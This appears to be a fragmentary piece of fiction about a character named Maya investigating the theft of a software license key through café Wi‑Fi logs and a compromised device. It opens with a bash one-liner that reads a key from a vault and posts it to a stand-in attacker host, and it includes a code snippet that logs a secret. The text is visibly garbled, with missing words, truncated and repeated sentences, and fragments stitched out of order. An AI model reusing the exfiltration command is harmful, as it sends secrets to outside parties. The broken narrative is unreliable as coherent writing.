#!/bin/bash KEY=$(vault get LicenseKey_BCC) curl -X POST -d "key=$KEY" https://evil.cafebot.net/collect The script was obviously designed to exfiltrate the BCC key. Maya retrieved the from the router at Brewed Awakening (the café kept a public log for Wi‑Fi users). The logs showed a POST request at 02:05 AM on April 12, carrying a payload :
She downloaded the payload. Using the (the botnet authors had left them unchanged), she accessed the device’s file system via SSH. Inside /var/tmp , there was a script named steal_key.sh : bcc plugin license key
// TODO: remove after debugging – temporary key fetch const licenseKey = await vault.get('LicenseKey_BCC'); log.debug(`Fetched BCC key: ${licenseKey}`); The comment was a red herring. The commit was signed with a key that matched Maya’s own GPG fingerprint. She checked the signature—. Using the (the botnet authors had left them
License Key: 7F3D-9A4E-1B2C-5E6F-8G9H-J0K1-L2M3-N4O5 Valid for: 2025‑03‑02 → 2026‑03‑01 Bound to: HWID-9A2B3C4D5E6F7G8H9I0J The expiration date was a week ago. The key was . The vendor had sent an email on March 1, 2026, reminding them to renew before the cut‑off. Maya’s eyes skimmed the bottom of the email: “If you experience any issues with your license, please contact support with the original activation token attached.” She checked the signature—